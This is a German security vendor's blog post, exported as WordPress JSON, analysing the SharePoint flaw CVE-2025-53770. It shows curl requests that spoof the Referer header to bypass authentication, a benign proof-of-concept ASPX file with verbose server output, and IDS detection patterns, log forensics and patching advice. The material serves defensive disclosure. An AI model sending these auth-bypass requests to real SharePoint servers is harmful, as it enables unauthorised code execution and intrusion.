{"id":35497,"date":"2025-07-22T10:31:30","date_gmt":"2025-07-22T08:31:30","guid":{"rendered":"https:\/\/enginsight.com\/?p=35497"},"modified":"2025-08-04T13:56:59","modified_gmt":"2025-08-04T11:56:59","slug":"cve-2025-53770","status":"publish","type":"post","link":"https:\/\/enginsight.com\/de\/blog\/cve-2025-53770\/","title":{"rendered":"Kritische Sicherheitsl\u00fccke in Microsoft SharePoint (CVE-2025-53770)"},"content":{"rendered":"<h2 class=\"wp-block-heading\">CVE-2025-53770: Unauthentifizierte Remotecodeausf&#xFC;hrung in SharePoint 2019 (Update vom 24.07.25)<\/h2>\n\n\n\n<p>Autorin: Elisa Kasper<\/p>\n\n\n\n<p>Im vorherigen Beitrag haben wir die Schwachstelle CVE-2025-53770 bereits vorgestellt und ihre potenziellen Auswirkungen skizziert. In diesem Beitrag folgt nun die technische Analyse der L&#xFC;cke, mit Fokus auf Angriffsvektor, Reproduktion und M&#xF6;glichkeiten zur Erkennung sowie Pr&#xE4;vention.<\/p>\n\n\n\n<p>Einen Server mit nur einem einzigen simplen Request vollst&#xE4;ndig unter Kontrolle zu bringen, klingt wie ein zusammengefasster Wunschzettel zu Geburtstag, Ostern und Weihnachten,&#xA0;&#xA0;aus Sicht eines Angreifers. Mit der aktuellen SharePoint-Schwachstelle CVE-2025-53770 wird genau dieses Szenario Realit&#xE4;t.<\/p>\n\n\n\n<p>W&#xE4;hrend eines gezielten Tests auf einer frisch aufgesetzten Instanz von SharePoint Server 2019 konnte die Sicherheitsl&#xFC;cke validiert werden.&#xA0;&#xA0;Die L&#xFC;cke erlaubt es einem Angreifer, eigenen serverseitigen Code im Kontext des IIS-Anwendungspools auszuf&#xFC;hren und das ohne Authentifizierung.<\/p>\n\n\n\n<p>Im Beitrag werden deshalb folgende Punkte beschrieben:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Der Angriffsvektor: _layouts\/15\/ &#x2013; ein SharePoint-Relikt mit hoher Reichweite<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Eigener Versuchsaufbau zur Reproduktion<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Erkennung und Pr&#xE4;vention mit Enginsight<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Der Angriffsvektor: _layouts\/15\/ &#x2013; ein SharePoint-Relikt mit hoher Reichweite<\/strong><\/h3>\n\n\n\n<p>Das Verzeichnis _layouts\/15\/ ist jedem SharePoint-Admin ein Begriff. Es handelt sich um einen globalen Speicherort f&#xFC;r serverseitige ASPX-Komponenten, die systemweit, also &#xFC;ber alle Site Collections hinweg, verf&#xFC;gbar sind. Hier befinden sich essentielle Komponenten wie ToolPane.aspx, Settings.aspx oder auch SignOut.aspx.<\/p>\n\n\n\n<p>Normalerweise unterliegt dieses Verzeichnis strengen Zugriffsbeschr&#xE4;nkungen, vor allem, was das Hochladen oder gar&#xA0;&#xA0;Ausf&#xFC;hren von benutzerdefinierten Dateien angeht.&#xA0;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Versuchsaufbau: ToolPane.aspx als Einstiegspunkt<\/strong><\/h3>\n\n\n\n<p>Der erste Test richtete sich gegen eine native Datei: ToolPane.aspx. Mit einem simplen curl-Befehl wurde ein POST-Request an diese Seite geschickt:<\/p>\n\n\n\n<p>curl -X POST http:\/\/&lt;server&gt;\/_layouts\/15\/ToolPane.aspx \\<br>&#xA0;&#xA0;-H &#x201E;Referer: \/_layouts\/SignOut.aspx&#x201C; \\<br>&#xA0;&#xA0;-H &#x201E;Content-Length: 0&#x201C; -v<br>&#xA0;<br>Die Antwort war HTTP 200 OK, dazu eine vollgerenderte HTML-Fehlerseite. Das bedeutet, dass die Seite vollst&#xE4;ndig serverseitig verarbeitet wurde, obwohl keinerlei Authentifizierung vorlag. Der Request wurde angenommen und durch den ASP.NET-Lebenszyklus geleitet, ein Hinweis darauf, dass es keine Zugangskontrolle an dieser Stelle gibt.<br>&#xA0;<br>Der Schl&#xFC;ssel zur Umgehung liegt dabei im Referer-Header.<br>Dieser ist&#xA0;&#xA0;ein HTTP-Header, der dem Server mitteilt, von welcher Seite der aktuelle Request urspr&#xFC;nglich kommt. Er wird typischerweise vom Browser gesetzt, z.&#x202F;B. wenn ein Benutzer auf einen Link klickt. In Webanwendungen dient dieser Header gelegentlich als rudiment&#xE4;rer Schutzmechanismus, um zu pr&#xFC;fen, ob eine Anfrage aus einer vertrauensw&#xFC;rdigen Umgebung stammt.<br>&#xA0;<br>In diesem Fall jedoch wertet SharePoint den Referer-Header f&#xE4;lschlicherweise als Vertrauensbeweis. Wird dieser gezielt auf eine interne Seite wie \/layouts\/SignOut.aspx gesetzt, nimmt SharePoint an, die Anfrage sei legitim, obwohl sie tats&#xE4;chlich von einem externen, nicht authentifizierten Client stammt. Diese fehlerhafte Validierung f&#xFC;hrt effektiv zu einem Auth-Bypass.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Der Proof-of-Concept: Eigene Datei, echter Code<\/strong><\/h3>\n\n\n\n<p>Die eigentliche Best&#xE4;tigung der L&#xFC;cke folgte mit einem eigenen Testfile: testpoc.aspx. Ziel war es, herauszufinden, ob der Server nicht nur auf diese Datei zugreifen, sondern sie auch tats&#xE4;chlich ausf&#xFC;hren w&#xFC;rde. Die Datei bestand aus einer einzelnen Zeile serverseitigem C#-Code, der beim Aufruf den aktuellen Zeitpunkt zur&#xFC;ckliefert:<\/p>\n\n\n\n<p>&lt;%@ Page Language=&ldquo;C#&ldquo; %&gt;<\/p>\n\n\n\n<p>&lt;%<\/p>\n\n\n\n<p>&#xA0;&#xA0;&#xA0;&#xA0;Response.Write(&#x201E;PoC erfolgreich &#x2013; Serverzeit: &#x201C; + DateTime.Now.ToString(&#x201E;dd.MM.yyyy HH:mm:ss&#x201C;));<\/p>\n\n\n\n<p>%&gt;<\/p>\n\n\n\n<p>Sie wurde manuell in das Verzeichnis _layouts\/16\/ kopiert.&#xA0;<\/p>\n\n\n\n<p>Wesentlich an diesem Code ist der Aufruf von DateTime.Now. Dieser Ausdruck erzeugt einen Zeitstempel, der nur zur Laufzeit auf dem Server generiert werden kann. Wenn ein Webserver diese Information in der Antwort zur&#xFC;ckliefert, dann ist das ein klarer Beweis daf&#xFC;r, dass der Code ausgef&#xFC;hrt&#xA0;&#xA0;und nicht nur als statische Datei ausgeliefert wurde, wie es beispielsweise bei einer .html- oder .txt-Datei der Fall w&#xE4;re.<\/p>\n\n\n\n<p>In ASP.NET durchl&#xE4;uft jede .aspx-Datei, die vom Webserver verarbeitet wird, den sogenannten Page Lifecycle. Das bedeutet: Der Server erkennt anhand der Dateiendung und des Inhalts, dass es sich um serverseitigen Code handelt. Er ruft zur Verarbeitung die ASP.NET-Runtime auf, kompiliert den Code und f&#xFC;hrt ihn dann im Kontext des IIS-Anwendungspools aus. Erst danach wird das Ergebnis an den Client zur&#xFC;ckgegeben.<\/p>\n\n\n\n<p>Im konkreten Test wurde ein HTTP-POST an die Datei gesendet.<\/p>\n\n\n\n<p>curl -X POST http:\/\/&lt;server&gt;\/_layouts\/15\/testpoc.aspx \\<\/p>\n\n\n\n<p>&#xA0;&#xA0;-H &#x201E;Referer: \/_layouts\/SignOut.aspx&#x201C; \\<\/p>\n\n\n\n<p>&#xA0;&#xA0;-H &#x201E;Content-Length: 0&#x201C; -v<\/p>\n\n\n\n<p>Die Antwort war ein 200 OK mit exakt dem Text, den Response.Write(&#x2026;) erzeugt, inklusive des aktuellen Zeitstempels.&#xA0;<\/p>\n\n\n\n<p>curl -X POST http:\/\/&lt;server&gt;:80\/_layouts\/15\/testpoc.aspx&nbsp;&nbsp;&nbsp;-H &bdquo;Referer: \/_layouts\/SignOut.aspx&ldquo;&nbsp;&nbsp;&nbsp;-H &bdquo;Content-Length: 0&ldquo;&nbsp;&nbsp;&nbsp;-k -v<\/p>\n\n\n\n<p>*&#xA0;&#xA0;&#xA0;Trying 10.x.x.4:80&#x2026;<\/p>\n\n\n\n<p>* Connected to &lt;server&gt; (10.x.x.4) port 80 (#0)<\/p>\n\n\n\n<p>&gt; POST \/_layouts\/15\/testpoc.aspx HTTP\/1.1<\/p>\n\n\n\n<p>&gt; Host: &lt;server&gt;<\/p>\n\n\n\n<p>&gt; User-Agent: curl\/7.74.0<\/p>\n\n\n\n<p>&gt; Accept: *\/*<\/p>\n\n\n\n<p>&gt; Referer: \/_layouts\/SignOut.aspx<\/p>\n\n\n\n<p>&gt; Content-Length: 0<\/p>\n\n\n\n<p>&gt;&nbsp;<\/p>\n\n\n\n<p>* Mark bundle as not supporting multiuse<\/p>\n\n\n\n<p>&lt; HTTP\/1.1 200 OK<\/p>\n\n\n\n<p>&lt; Cache-Control: private<\/p>\n\n\n\n<p>&lt; Content-Type: text\/html; charset=utf-8<\/p>\n\n\n\n<p>&lt; Server: Microsoft-IIS\/10.0<\/p>\n\n\n\n<p>&lt; X-SharePointHealthScore: 5<\/p>\n\n\n\n<p>&lt; X-AspNet-Version: 4.0.30319<\/p>\n\n\n\n<p>&lt; SPRequestGuid: ef06b4a1-3207-d0dc-adbb-71097a9a47ff<\/p>\n\n\n\n<p>&lt; request-id: ef06b4a1-3207-d0dc-adbb-71097a9a47ff<\/p>\n\n\n\n<p>&lt; X-FRAME-OPTIONS: SAMEORIGIN<\/p>\n\n\n\n<p>&lt; X-Powered-By: nosniff<\/p>\n\n\n\n<p>&lt; MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly<\/p>\n\n\n\n<p>&lt; Date: Mon, 21 Jul 2025 18:32:22 GMT<\/p>\n\n\n\n<p>&lt; Content-Length: 55<\/p>\n\n\n\n<p>&lt;&nbsp;<\/p>\n\n\n\n<p>* Connection #0 to host &lt;server&gt; left intact<\/p>\n\n\n\n<p>PoC erfolgreich &#x2013; Serverzeit: 21.07.2025 20:32:22<\/p>\n\n\n\n<p>Das ist der entscheidende Moment: Der Server hat die Datei nicht einfach nur ausgeliefert, sondern den darin enthaltenen Code interpretiert, ausgef&#xFC;hrt und die Ausgabe an den anfragenden Client geschickt.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Warum ist das relevant f&#xFC;r CVE-2025-53770?<\/strong><\/h3>\n\n\n\n<p>Die L&#xFC;cke besteht nicht nur darin, dass Dateien im Layouts-Verzeichnis aufrufbar sind, sondern die Schwachstelle liegt vielmehr darin, dass keine Zugriffskontrolle greift, wenn zus&#xE4;tzliche (nicht-standardm&#xE4;&#xDF;ige) Dateien dort abgelegt und direkt &#xFC;ber HTTP angesprochen werden.<\/p>\n\n\n\n<p>Diese Konstellation entspricht dem Bedrohungsszenario, das CVE-2025-53770 beschreibt:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Serverseitige ASP.NET-Komponenten k&#xF6;nnen ohne vorherige Authentifizierung ausgef&#xFC;hrt werden.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Die Ausf&#xFC;hrung erfolgt in einem global eingebundenen und privilegierten Verzeichnis.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Eine Sicherheitspr&#xFC;fung auf Anwendungsebene findet nicht statt.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Die Ausf&#xFC;hrung erfolgt mit den Rechten des SharePoint Application Pools.<\/li>\n<\/ul>\n\n\n\n<p>F&#xFC;r Angreifer ist das ein idealer Einstiegspunkt, um beispielsweise eine Web Shell zu installieren, interne Informationen auszulesen oder Persistenz in einem kompromittierten Netz zu etablieren.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Erkennung und Pr&#xE4;vention mit Enginsight<\/strong><\/h3>\n\n\n\n<p>Um Systeme fr&#xFC;hzeitig vor der Ausnutzung von Schwachstellen wie CVE-2025-53770 zu sch&#xFC;tzen, ist nicht nur Patch-Management entscheidend, sondern auch eine zuverl&#xE4;ssige Erkennung von Angriffsmustern im laufenden Betrieb.<\/p>\n\n\n\n<p>Der Enginsight Pulsar bietet die M&#xF6;glichkeit, SharePoint-Server auf das Vorhandensein verwundbarer Versionen zu &#xFC;berpr&#xFC;fen.&#xA0;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"908\" height=\"178\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Pulsar.png\" alt=\"\" class=\"wp-image-35517\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Pulsar.png 908w, https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Pulsar-300x59.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Pulsar-768x151.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\"\/><\/figure>\n\n\n\n<p>Dar&#xFC;ber hinaus konnte erfolgreich nachgewiesen werden, dass das&#xA0;<strong>Intrusion Detection System (IDS)&#xA0;<\/strong>von Enginsight in der Lage ist, Exploit-Versuche zuverl&#xE4;ssig ab Stufe 2 zu erkennen und je nach Konfiguration&#xA0;&#xA0;auch aktiv zu blockieren. So wurde unter Testbedingungen eine manipulierte POST-Anfrage gegen _layouts\/15\/testpoc.aspx erkannt und direkt unterbunden:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"908\" height=\"58\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Manipulierte-POST-Anfrage.png\" alt=\"\" class=\"wp-image-35519\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Manipulierte-POST-Anfrage.png 908w, https:\/\/enginsight.com\/wp-content\/uploads\/Manipulierte-POST-Anfrage-300x19.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Manipulierte-POST-Anfrage-768x49.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"908\" height=\"362\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/IDS-Regel.png\" alt=\"\" class=\"wp-image-35521\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/IDS-Regel.png 908w, https:\/\/enginsight.com\/wp-content\/uploads\/IDS-Regel-300x120.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/IDS-Regel-768x306.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\"\/><\/figure>\n\n\n\n<p>Die zugrunde liegende IDS-Regel pr&#xFC;ft gezielt auf typische Merkmale des Exploits:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Referer-Header<\/strong>&#xA0;mit verd&#xE4;chtigen Werten wie:<br>\/layouts\/SignOut.aspx<\/li>\n\n\n\n<li>Pfadbestandteile wie:<br>\/_layouts\/15\/ oder \/_layouts\/16\/<\/li>\n<\/ul>\n\n\n\n<p>Eine zus&#xE4;tzliche Regel erkennt verd&#xE4;chtige GET-Anfragen, die auf bekannte Exploit-Trigger wie z.&#x202F;B. \/_layouts\/spinstall0.aspx zielen &#x2013; ebenfalls mit Varianten f&#xFC;r SharePoint 2013, 20<\/p>\n\n\n\n<p><strong>Wichtiger Hinweis!<\/strong><\/p>\n\n\n\n<p>Es ist wichtig zu beachten, dass die IDS-Regeln nur bei unverschl&#xFC;sseltem HTTP-Traffic greifen. Wird die Kommunikation &#xFC;ber HTTPS abgewickelt (was in Produktivumgebungen &#xFC;blich ist), kann der Inhalt der Anfragen nicht eingesehen werden.&#xA0;&#xA0;Um dennoch eine transparente Nachvollziehbarkeit sicherzustellen, wird empfohlen, zus&#xE4;tzlich die IIS-Logdateien in die Sicherheits&#xFC;berwachung einzubinden.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Erg&#xE4;nzende forensische Analyse: IIS Logs<\/strong><\/h2>\n\n\n\n<p>F&#xFC;r eine tiefergehende Analyse empfiehlt es sich au&#xDF;erdem, die&#xA0;<strong>IIS-Logdateien<\/strong>&#xA0;auf verd&#xE4;chtige Requests zu untersuchen. Diese befinden sich standardm&#xE4;&#xDF;ig unter:<\/p>\n\n\n\n<p><strong>C:\\inetpub\\logs\\LogFiles\\W3SVC&lt;SiteID&gt;<\/strong><\/p>\n\n\n\n<p>Hier lassen sich z.&#x202F;B. ungew&#xF6;hnliche POST-Requests oder Aufrufe von .aspx-Dateien au&#xDF;erhalb typischer Muster nachvollziehen:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"178\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/POST-Requests.png\" alt=\"\" class=\"wp-image-35523\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/POST-Requests.png 908w, https:\/\/enginsight.com\/wp-content\/uploads\/POST-Requests-300x59.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/POST-Requests-768x151.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\"\/><\/figure>\n\n\n\n<p>Mit dem Enginsight SIEM ist es &#xFC;ber den File-Kollektor m&#xF6;glich, die Dateien direkt ins SIEM zu integrieren. Da SharePoint jedoch t&#xE4;glich eine neue Protokolldatei anlegt, muss der Kollektor bisher regelm&#xE4;&#xDF;ig angepasst werden, um stets die aktuelle Datei zu erfassen. Das erschwert die kontinuierliche &#xDC;berwachung und macht die Konfiguration aufw&#xE4;ndiger.<\/p>\n\n\n\n<p>Mit der kommenden Version Pulsar 6.8.6 wird die Einbindung deutlich vereinfacht: Der File-Kollektor unterst&#xFC;tzt k&#xFC;nftig ganze Verzeichnisse, wodurch alle neu erstellten Dateien automatisch erfasst werden. Besonders f&#xFC;r die kontinuierliche &#xDC;berwachung der SharePoint-Protokolldateien bedeutet dies eine sp&#xFC;rbare Erleichterung und mehr Effizienz.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"492\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Ueberwachung-SharePoint-Protokoll-Dateien.png\" alt=\"\" class=\"wp-image-35525\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Ueberwachung-SharePoint-Protokoll-Dateien.png 908w, https:\/\/enginsight.com\/wp-content\/uploads\/Ueberwachung-SharePoint-Protokoll-Dateien-300x163.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Ueberwachung-SharePoint-Protokoll-Dateien-768x416.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\"\/><\/figure>\n\n\n\n<p>Nachdem die Logdateien &#xFC;ber den File-Kollektor eingebunden wurden, stehen sie nun zentral im Enginsight DataLake zur Verf&#xFC;gung. Die Daten sind dort nicht nur vollst&#xE4;ndig sichtbar, sondern k&#xF6;nnen auch gezielt durchsucht und ausgewertet werden.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Data-Lake-1024x527.png\" alt=\"\" class=\"wp-image-35527\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Data-Lake-1024x527.png 1024w, https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Data-Lake-300x154.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Data-Lake-768x395.png 768w, https:\/\/enginsight.com\/wp-content\/uploads\/Enginsight-Data-Lake.png 1390w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Gezielte-Durchsuchung-1024x446.png\" alt=\"\" class=\"wp-image-35529\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Gezielte-Durchsuchung-1024x446.png 1024w, https:\/\/enginsight.com\/wp-content\/uploads\/Gezielte-Durchsuchung-300x131.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Gezielte-Durchsuchung-768x334.png 768w, https:\/\/enginsight.com\/wp-content\/uploads\/Gezielte-Durchsuchung.png 1390w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><\/figure>\n\n\n\n<p>Dar&#xFC;ber hinaus besteht die M&#xF6;glichkeit, auf Basis definierter Indikatoren, zum Beispiel verd&#xE4;chtiger Pfade wie \/_layouts\/SignOut.aspx, eigene Streams zu erstellen. Diese Streams filtern relevante Ereignisse in Echtzeit und lassen sich mit einem Workflow zur automatischen Benachrichtigung kombinieren. Auf diese Weise k&#xF6;nnen sicherheitskritische Aktivit&#xE4;ten unmittelbar erkannt und weiterverarbeitet werden.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" src=\"https:\/\/enginsight.com\/wp-content\/uploads\/Erkennung-sicherheitsrelevanter-Aktivitaeten-1024x527.png\" alt=\"\" class=\"wp-image-35531\" srcset=\"https:\/\/enginsight.com\/wp-content\/uploads\/Erkennung-sicherheitsrelevanter-Aktivitaeten-1024x527.png 1024w, https:\/\/enginsight.com\/wp-content\/uploads\/Erkennung-sicherheitsrelevanter-Aktivitaeten-300x154.png 300w, https:\/\/enginsight.com\/wp-content\/uploads\/Erkennung-sicherheitsrelevanter-Aktivitaeten-768x395.png 768w, https:\/\/enginsight.com\/wp-content\/uploads\/Erkennung-sicherheitsrelevanter-Aktivitaeten.png 1390w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Fazit<\/h2>\n\n\n\n<p>Mit Hilfe von Enginsight lassen sich sowohl verwundbare Systeme identifizieren als auch aktive Exploit-Versuche erkennen und stoppen vorausgesetzt, der Netzwerkverkehr liegt unverschl&#xFC;sselt vor oder wird per SSL-Inspection mitgeschnitten. Erg&#xE4;nzend zur technischen Pr&#xE4;vention sind regelm&#xE4;&#xDF;ige Log-Analysen sowie die H&#xE4;rtung der SharePoint-Konfiguration essenziell, um Angreifern keine Angriffsfl&#xE4;che zu bieten.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\">\n\n\n\n<h2 class=\"wp-block-heading\">Handlungsempfehlung von Enginsight (Stand 22.07.25)<\/h2>\n\n\n\n<p>Die als kritisch eingestufte Schwachstelle in Microsoft SharePoint Servern (CVE-2025-53770) wird aktuell aktiv ausgenutzt. Unter bestimmten Voraussetzungen erm&#xF6;glicht sie Angreifern, die vollst&#xE4;ndige Kompromittierung betroffener Systeme durch Remote Code Execution (RCE).<\/p>\n\n\n\n<p>Nach unserem Kenntnisstand sind insbesondere folgende Versionen von selbstbetriebenden Servern betroffen:<\/p>\n\n\n\n<p>SharePoint Server 2019<br>SharePoint Subscription Edition<br>SharePoint Server 2016<\/p>\n\n\n\n<p><br>Microsoft und CISA haben entsprechende Sicherheitswarnungen ver&#xF6;ffentlicht und dringend zur sofortigen Einspielung bereitgestellter Updates geraten.<\/p>\n\n\n\n<p><strong>Allgemeine Empfehlungen:<\/strong><\/p>\n\n\n\n<p>&#x2013; Installieren Sie umgehend die bereitgestellten Sicherheitsupdates von SharePoint.<\/p>\n\n\n\n<p>&#x2013; Aktivieren Sie AMSI-Schutzmechanismen und stellen Sie sicher, dass Microsoft Defender Antivirus\/Endpoint aktiv ist.<\/p>\n\n\n\n<p>&#x2013; Rotieren Sie sensible MachineKeys und f&#xFC;hren Sie anschlie&#xDF;end einen Neustart der betroffenen Dienste durch (IIS).<\/p>\n\n\n\n<p>&#x2013; &#xDC;berpr&#xFC;fen Sie Ihre Systeme auf Kompromittierungsindikatoren, insbesondere ungew&#xF6;hnliche .aspx-Dateien, verd&#xE4;chtige POST-Anfragen und Systemver&#xE4;nderungen.<\/p>\n\n\n\n<p>&#x2013; Setzen Sie ggf. forensische Ma&#xDF;nahmen um und ziehen Sie bei Bedarf Unterst&#xFC;tzung durch unser Security-Team hinzu.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Unsere Empfehlung nach aktuellem Kenntnisstand<\/h3>\n\n\n\n<p>Selbst nach aktiviertem Update scheint ein Angriff m&#xF6;glich zu sein. Wir empfehlen, selbstbetriebene Server auch nach erfolgtem Sicherheitsupdate vom Netz zu nehmen. Da wir die aktuelle Sicherheitsl&#xFC;cke als sehr kritisch einstufen, empfehlen wir generell einen Alarm f&#xFC;r neu aufkommende kritische CVE ab dem CVSS Score 9 anzulegen. Weiterhin arbeiten wir bereits kurzfristig an der Implementierung zur Erkennung m&#xF6;glicher Angriffe &#xFC;ber die CVE-2025-53770. &#xDC;ber entsprechende Updates halten wir Sie zeitnahe auf dem Laufenden.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2025-53770: Unauthentifizierte Remotecodeausf&#xFC;hrung in SharePoint 2019 (Update vom 24.07.25) Autorin: Elisa Kasper Im vorherigen Beitrag haben wir die Schwachstelle CVE-2025-53770 bereits vorgestellt und ihre potenziellen Auswirkungen skizziert. In diesem Beitrag folgt nun die technische Analyse der L&#xFC;cke, mit Fokus auf Angriffsvektor, Reproduktion und M&#xF6;glichkeiten zur Erkennung sowie Pr&#xE4;vention. Einen Server mit nur einem einzigen simplen [&#x2026;]<\/p>\n","protected":false},"author":30,"featured_media":35500,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_eb_attr":"","footnotes":""},"categories":[334],"tags":[],"class_list":["post-35497","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-schwachstellen"],"_links":{"self":[{"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/posts\/35497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/users\/30"}],"replies":[{"embeddable":true,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/comments?post=35497"}],"version-history":[{"count":0,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/posts\/35497\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/media\/35500"}],"wp:attachment":[{"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/media?parent=35497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/categories?post=35497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enginsight.com\/de\/wp-json\/wp\/v2\/tags?post=35497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}